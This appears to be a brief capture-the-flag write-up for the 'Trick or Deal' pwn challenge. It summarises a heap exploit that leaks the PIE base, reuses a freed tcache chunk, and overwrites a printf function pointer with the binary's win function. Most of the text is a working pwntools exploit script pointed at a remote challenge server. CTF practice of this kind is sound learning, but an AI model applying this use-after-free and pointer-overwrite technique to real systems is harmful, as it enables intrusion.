Trick or Deal

Tue, Apr 1, 2025

• Summary

  • Leak PIE base using the uninitialized buffer leak –> free the chunk that holds the weapons as well as the printf function pointer –> malloc a chunk of the same size to receive it from the tcache bin –> overwrite the old function pointer with the win function present in the binary

• Exploit

• #!/usr/bin/python3
  from pwn import context, args, gdb, ELF, process, u64, log, remote, p64
  
  context.arch = 'amd64'
  context.binary = elf = ELF("./patched_trick")
  libc = ELF("./glibc/libc.so.6")
  
  gs = '''
  continue
  '''
  def start():
      if args.GDB:
          return gdb.debug(elf.path, gdbscript=gs)
      else:
          return process(elf.path)
  
  #p = start()
  p = remote("83.136.253.184", 59748)
  
  def main():
      p.sendlineafter(b'do? ', b'2')
      p.sendafter(b'!!?', b'A' * 56)
      p.recvuntil(b'A'*56)
      leak = p.recv(24) # Something weird was going on here, thinking fflush caused it
      elf.address = u64(leak[:6].ljust(8,b'\x00')) - 0x9b0
      log.success(f"PIE base: {hex(elf.address)}")
      log.info(f"Win address: {hex(elf.sym.unlock_storage)}")
  
      p.sendlineafter(b'do? ', b'4')
  
      p.sendlineafter(b'do? ', b'3')
      p.sendlineafter(b'n):', b'y')
      p.sendlineafter(b'be? ', str(0x58).encode())
      p.sendafter(b'me? ', b'A' * 0x48 + p64(elf.sym.unlock_storage))
  
  
      p.interactive()
  
  if __name__ == '__main__':
      main()